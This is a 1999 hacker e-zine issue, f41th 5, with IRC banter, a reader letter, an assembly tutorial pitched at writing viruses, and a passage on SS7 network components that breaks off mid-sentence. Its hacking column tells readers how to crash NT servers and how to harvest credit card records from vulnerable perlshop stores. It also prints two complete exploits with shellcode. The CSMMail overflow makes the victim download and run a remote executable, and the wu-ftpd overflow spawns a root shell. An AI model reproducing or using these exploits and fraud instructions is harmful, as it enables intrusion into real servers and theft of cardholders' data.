yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| [f41th Issue 5 June 1999] [c] D4RKCYDE 1999 [darkcyde.system7.org] [#darkcyde EFNET] 'f41th, chOice of the real phreak' 'f41th - Die Wahl des wahren Phreak' 'find us on the PSTN bitch' 'Zu finden auf dem PSTN bitch' --> Index ]----oooo-------------------------------oooo----[ f41th 5! ]------ -->]OO[::::[ Editorial ]:::::::[OO--[ hybrid ]--- -->]OO[::::[ Letters to f41th ]:::::::[OO--[ you ]--- -->]OO[::::[ SUIDcyde ]:::::::[OO--[ bodie ]--- -->]OO[::::[ Assembly coding and virii ]:::::::[OO--[ bodie ]--- -->]OO[::::[ SS7 network conponments ]:::::::[OO--[ digiphreq ]--- -->]OO[::::[ Electronic data ]:::::::[OO--[ zomba ]--- -->]OO[::::[ Linux system security ]:::::::[OO--[ zomba ]--- -->]OO[::::[ Zombas bonus phone warez ]:::::::[OO--[ zomba ]--- -->]OO[::::[ Scan of O8OO 252 ]:::::::[OO--[ shadow ]--- -->]OO[::::[ IRC logz ]:::::::[OO--[ #darkcyde ]--- -->]OO[::::[ Wireless E-911 Service ]:::::::[OO--[ digiphreq ]--- -->]OO[::::[ Introduction to carding ]:::::::[OO--[ Kryptus ]--- -->]OO[::::[ Political views ]:::::::[OO--[ nino ]--- -->]OO[::::[ Outness ]:::::::[PP--[ hybrid ]--- [ random quotes from tonekilla - he wonders why he's not in ] [ darkcyde anymore - a) lame b) idle c) pisses me off on irc. ] its like: | suck hybrid's cock for ops | <-- yEp motherfuckers stop <-- nope NINO IS MY FUCKING BRO <-- heh? dont tell me to relax <-- why? i dont give a fuck <-- we know well FUCK YOU <-- ok FUCK YOU <-- OK FUCK YOU HYBRID <-- no what the fuck is your problem? you didnt get banned for no fucking reason from a channel you properly ran for 3 months then someone comes in, kicks and bans you and fucking turns it into a dynasty *** DTMFslut sets mode: +b *!*tonekilla@*.tecinfo.com *** tonekilla was kicked by DTMFslut (banned: learn some manners bitch) <---- well said ----[ shoutz [ special shouts to kryptis (we'll miss ya bro) ]---------- ----------------[ simmeth digitalfokus mobsters bosplaya osiris ]---------- ----------------[ * WERD WERD WERD WERD WERD WERD WERD WERD WERD ]---------- ----------------[ shadowx ch1ckie subz gr1p ph1x tip gb shylock ]---------- ----------------[ prez_ jasun xio psyclone knight oclet nino dave ]---------- ----------------[ b4b0 9x phunc deadsoul aktive sonicborg asshair ]---------- ----[ memberz ----------------[ hybrid downtime force zomba bodie digiphreq elf ]---------- ----------------[ mortis alphagod lowtek | new member: shadowx ]---------- | new member: postalphreak | new member: nino -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ Editorial ]:::::::[OO--[ by hybrid ]------[ hybrid@phunc.com ]-- -->[OO]:::::::::::::::::::::::::::::[ http://www.phunc.com/~hybrid ]::::::::: Hi there, yep, we made it to another issue, this time it's even better :> We got bodie's new column [SUIDCYDE] and even more leet info. It's now spring, so we've decided to do a spring clean of darkcyde.. for starters all the idle people, ie: tonekilla, have been kicked out, and we've decided to improve the qaulity of the zine, cuting down on the codez, and increasing the info. I'm not writting anything for this issue cuse I've done enough already, I'm the one who has to put all this stuff together, and keep it all organised, etc. I'd like to say one thing to the dudes in #darkcyde efnet, that are bitching about shit.. It's irc, nothing more. HEH, take a look at the logs our bot (DTMFslut) recorded of the channel - at the end of this issue. Welp, theres my leeto editorial done, now I gota stick this stuff into 14-inch screen format, does'nt ms-dos edit 0wn? -cya on irc #darkcyde. hybrid http://www.phunc.com/~hybrid <---- my site, check it out. -->]OO[::::[ Mail ]:::::::[OO--[ you ]--------------------------------------- you have new mail #pine From bennygill@gmx.net Sun May 9 22:30:52 1999 Date: Sun, 9 May 1999 22:15:04 +0100 From: Ben J. Gill To: hybrid@phunc.com Subject: f41th ISSUE IIII Hiya , Don't want to be a smart ass , but I just read f41th ISSUE IIII and noticed that you translated the heading into German . I happen to be a German Phreak living in the UK ( London ) at the moment and couldn't help but notice that the transl. isn't quite what it should be . Here's my Version : 'f41th, chOice of the real phreak' 'f41th - Die Wahl des wahren Phreak' 'find us on the PSTN bitch' 'Zu finden auf dem PSTN bitch' I dunno what a PSTN bitch is , but "bitch" is not a "Weibchen" in German , bitch = "Nutte , Hure" Hope I wasn't too much of a smart ass , but I just couldn't help it ;o) Ben http://bennygill.home.pages.de ICQ : 10302953 mail : Phrenetic@gmx.net ( H/P mails ) bennygill@gmx.net ( Personal mails ) funkymonkey@geek.com ( Tech / News Mails ) ---------[ Thanks for the interest in our/my bad German skillz. ---------[ HEH, look I spelt it correctly this time... :) ---------[ #screen -r -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]--- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Welcome to the new regular hacking section in faith, this section is devoted to the latest news, techniches and exploits in hacking. Enjoy ---------- Bugtraq watch As a regular colum now in faith i'll be telling everyone what is going on in the worlds greatest mailing list - bugtraq, it's where all the latest exploits get posted to and it's the best list for security. Recently there have been several bugs reported. Possibly the most severe one was a report of being able to remotly reboot an NT machine. This is how to do it: find an NT box running SP4 (service pack 4) Telnet to port 1723 type 256 'h' charictors and hit return Press ^D This hopefully should cause the machine to completely reboot and cause microshaft a few more headaches which is always good news for our favorite linux servers :). This bug hasn't been confirmed yet and some people haven't been able to get it to work, but give it a go anyway Possibly the most serious flaw uncovered recently was an exploit in some online shopping services, some of these are run on a software package called perlshop. With this you can get peoples credit card info which is always nice :) For this one all you have to do is find a site running the software (it may tell you that it is on the web page) and go to the directory: www.vulnerable.com/store/customers/ or it may be in: www.vulnerable.com/store/temp_customers/ This bug is likely to be fixed extreemly quickly so if ya wanna exploit it, ya better hurry up :) There has also been reported buffer overflows in the windows CSMMail SMTP server. Time for some exploit code: <--------------------------CUT HERE-------------------------> #define UNIX #ifndef UNIX #include #include #include #include #define CLOSE _close #define SLEEP Sleep #else #include #include #include #include #include #include #include #define CLOSE close #define SLEEP sleep #endif /* CSMMail Exploit by _mcp_ Win32 port and sp3 address's by Acpizer Greets go out to the following people: Morpheus, Sizban, Rocket, Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite and #win32asm. You can contact me by e-mail or on efnet. As always no greets go out to etl */ const unsigned long FIXUP1 = 264; const unsigned long FIXUP2 = 268; const unsigned long OFFSET = 260; char code[] = "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB" "\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46" "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3" "\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66" "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33" "\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51" "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6" "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF" "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57" "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1" "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66" "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D" "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46" "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F" "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66" "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53" "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30" "\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } #ifndef UNIX memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length); #else bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); #endif return(binip); } int usages(char *fname) { printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ .\n"); printf("Win32 porting and nt sp3 address's by Acpizer \n"); printf("Usages: \n"); printf("%s \n", fname); printf("win98 SP1:\n"); printf(" = 0xBFF78030\n"); printf(" = 0xBFF79243\n"); printf("NT SP3:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E53FC7\n"); printf("NT SP4:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E9A3A4\n"); printf("Will make running CSMMail download, save, and\n"); printf("execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,targethost,sinlen; struct sockaddr_in sin; static unsigned char buffer[20000]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long rw_mem; #ifndef UNIX WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) exit(1); #endif if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0) { printf("Input Error, the fixup memory address has incorrect format\n"); exit(0); } if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0) { printf("Input error, the return address has incorrect format\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"VRFY "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr2=ptr; ptr2+=FIXUP1; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr2=ptr; ptr2+=FIXUP2; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr+=OFFSET; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); #ifndef UNIX send(sock, "HELO lamer.com\r\n",16, 0); send(sock, (char *)&buffer, strlen((char *)&buffer), 0); send(sock,"\r\n",2,0); #else write(sock, "HELO lamer.com\r\n",16); write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */ write(sock,"\r\n",2); #endif SLEEP(1); printf("Sent the egg\n"); #ifndef UNIX WSACleanup(); #endif CLOSE(sock); exit(1); } <--------------------------CUT HERE-------------------------> Also there has been another buffer overflow found in wu-ftpd, a popular ftp deamon for unix servers. This only exists in beta versions 12 - 18, and these aren't the current version, so don't be supprised if you find that not too many servers are running it. <--------------------------CUT HERE-------------------------> /* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include #include #include #include #include #include #include #include #include #include #include /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. */ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. (the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if (parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). */ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) { va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); } <--------------------------CUT HERE-------------------------> Thats about all for the moment. If you want to subscribe to bugtraq yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq in the body of the message Bodie ---------- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ Assembly language programing and virri ]:::::[OO--[ by Bodie ]-- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Part 1 A lot of people think that writting virii is a hard thing to do, the truth is, it's reletivly easy, but it does take a bit of assembly language knowlege. In this file i will show ya a little assembly programming and how to make a simple virus (so all you script kiddies out there can also create something like mellisa - the kewlest peice of programming on the face of the planet :)) But learning assembly language doesn't have to be a completely impossible task, although it probably is a little harder than learing your average C clone. To understand this you will need a basic knowlege of binary numbers. This isn't hard really. One person once said to me, "languages are like druggies, the higher they are, the easier they are to get on with, but the less use they are to you :)" Assembly language is more than that though, it gets to the centre of the hacker mentality, it allows you to screw with the exact working of the computer, some say you can't be a hacker unless you know assembly language, I disagree but hacking is about making a computer do something it isn't supposed to do, and how can ya do that unless you know exactly how things are working inside the computer? BASICS Assembly language programming is different depending on which processor you have, but I know the intel chips best, so i will write this for those chips, for other chips the instructions may be totally different. REGISTERS To learn Assembly language you need a basic understanding of the design of the chip that your writing for. An intel chip is made up of things called registers. These are places in a chip where a number can be stored and manipulated. There are four types of registers, general purpose registers, index registers, segment registers and stack registers. The first type is the general purpose registers. There are 4 general purpose registers, EAX, EBX, ECX and EDX. These are 32-bit registers. These registers can be split up into smaller 16-bit registers called, AX, BX, CX and DX, and these can be further split into 8-bit registers called [A-D]H and [A-D]L. They are arrange mainly like this. <-------------E[A-D]X------------> _________________________________ | | | | | [A-D]L | [A-D]H | | |________|________|_______________| <-----[A-D]X-----> The next type of register is called a Stack Register. There are 2 stack registers, called BP and SP, as you might have guessed, these are used mainly on the stack. SP is the stack pointer, it tells you where the next item on the stack is place, but more on that later. Index Registers are used to hold data on the current program running. IP is the most important of these, as it tells the computer where the next instruction to be executed is located. You can't directly mainpulate it (that means you can't put a number directly into it - althought there are other ways of having fun with it :)) Other index registers are EDI(Destination index) and ESI(source index) Again these can be split into SI and DI, but unlike general purpose registers, they can't be split any further. Segment and offset registers are responsible for accessing memory locations. This is an system that has been left over for compatability with older 16-bit chips, because in a 16-bit register, you could only access 32K memory locations, the chip designers devised a way to use 2 registers to access a memory location, this allows you to access enough memory for almost anyone. The segment is the lower half of the location and it can be held in any segment register. These are CS, DS, ES, SS, FS and GS. The offset can be held in any general purpose register. THE STACK Another place to store data is on the stack. Like the name suggests, this is just an area where the data is piled when you need to clear a register for something else, but still need the data to be retrieved later. The stack works on a 'last in, first out' (LIFO) principal. This means that the last item of data to be put on to the stack is the first to come off, when you take data from the stack. When you put an item of data on to the stack it goes on the highest memory location available in the stack, and then the stack pointer (SP) is set to point to the last item put onto the stack. This is so that the computer knows where the last item is located. The stack is arranged like this. ___________ | | | | | data (1) | |___________| | | | | | data (2) | |___________| <--------Stack Pointer (SP) | | | | | | | Free | | Space | | | | | |___________| <--------Stack Segment (SS) In this example, data 3 would be the first to be returned when a process is accessing the stack, this is because data 2 was the last item to be put on the stack. If another item was to be put on the stack it would be put into the free space area and the stack pointer would be moved to represnt this. This would then be the first irem to be returned. VARIABLES Variables are easily defined in assembly language, just like any other language. The way to do it is [variable_name] [type] [value] a comman usage of this would be: hello db "hello!!!$" ; sets a variable of type db to "hello" all strings in assembly language have to be terminated with a $ symbol. The variable type we are using is db, this is the common type for strings like this, there are other variable types, i will tell you these later. SOME INSTRUCTIONS The structure of an assembly language program is very different from the structure of a program in a higher level language. It consists of a series of 1 line instructions. Some instructions are: MOV [destination] [source] The destination has to be a register, but the source can be either an imediate value or the contents of another register. mov ax 10 ; moves the value 10 into the register ax mov bx cx ; moves the value of the register cx into bx the ; represents the end of an instruction. anything after this is a comment PUSH [data] Puts data onto the stack POP [register or variable] puts the first value on the stack into the register or variable push ax ; puts the value of ax onto the stack push bx ; puts the value of bx onto the stack pop ax ; puts the first value on the stack into ax pop bx ; puts he next value on the stack into bx This program would swap the values of registers ax and bx. INT [number] this is a command which calls an interupt from either DOS or the BIOS. This allows you to do things like write to the screen or opening a file or something. There may be several subroutines that can be called from each interupt number. These are distinguished between by using the register ah. mov ah 9 ; this tells the int command to call subroutine 9 from the interupt int 21h ; this calls interupt 21, which is the standard DOS interupt In this program subroutine 9 tells the system to print something to the screen. More on this later. >From this we can write our first program. -------------------cut here-------------------- printed db "hello fucker$" ; creates the variable 'printed' mov dx OFFSET printed ; sets dx to the offset of the variable 'printed' mov ax SEG printed ; sets ax to the offset of the variable 'printed' mov ds ax ; moves ax (containing the segment) to ds - because ; ds the main segent register this now means that ; ds:dx is pointing to the variable 'printed' mov ah 9; int 21 ; this prints our message to the screen mov ah 4c00h; int 21h ; this executes subroutine 4c00 in 21h, this ends the program END; this ends the program -------------------cut here-------------------- This is the simplest program in assembly language. It just prints the message "hello" to the screen. All strings in assembly language have to be terminated with the $ charicter Like in most other languages, you can define procedures in assembly language. You do this like this . . [Code] . . . . procedure_name: . . . . Where procedure_name would be the name you give to the procedure. To call a procedure in assemble language you have to use a jump command, these are several of these but the most basic is simply jmp [procedure] this simply takes you to that procedure. There are different kinds of jump statements though, these act rather like if statements in other languages, and allow control flow in the program. With conditional jumps, there has to be a way of comparing values. This is the cmp command. It works like this cmp ah,5 ; is ax == 5? jne no ; if it isn't 5, jump to the procedure 'no' there are many different jump statements that use the compare command. Here is a list of some of them JA: Jump if the first number was above the second number JB: Jump if the first number was below the second number JE: Jump if both numbers were equal JAE: Jump if the first number was above or equal to the second number JBE: Jump if the first number was below or equal to the second number JNA: Jump if the first number was not above the second number JNB: Jump if the first number was not below the second number JNE: Jumps if both numbers were not equal JNAE: Jump if the first number was not above or equal to the second number JNBE: Jump if the first number was not below or equal to the second number There are other jump commands but these are the most common ones. Next time I'll show you how to write some basic programs and generally play about with the language. Keep reading ---------- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ SS7 Network Componments ]::[OO--[ digiphreq ]------------------- -->]OO[::::::::::::::::::::::::::::::::::::::[ digiphreq@webcrunchers.com ]-- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Components of an SS7 Network Darkcyde Communications 1999. digiphreq@webcrunchers.com written 3.29.99 released a long time afterwards.... This paper is intended as a brief overview of the components that make up a SS7 network. What they do, how they relate to other components and so on. This file won't be very complicated, but more of a small tutorial which just scrapes the surface of SS7 as a whole. This will focus more on networking than anything else. I. STP II. SP III. Datalinks A. Access Links B. Bridge Links C. Cross Links D. Diagonal Links E. Extended Links F. Fully Associated Links IV. A Good Fuck You, I'm Out I. STP: The STP or Signaling Transfer Point is basically the "switch" of the SS7 network. It's rather similar to the switch in the PSTN. While there is a difference in that a switch of the PSTN routes voice calls/connections, the STP routes digital traffic in the SS7 network. It basically routes to the outside world. The pairing or networking of these is pretty simple yet quite complex. They work on a simple ladder, tree, or more sophisticated a hierarchical basis. You basically have some STPs that provide access and routing for a node or local network. Next you have the STPs which connectother network's STPs together through Access 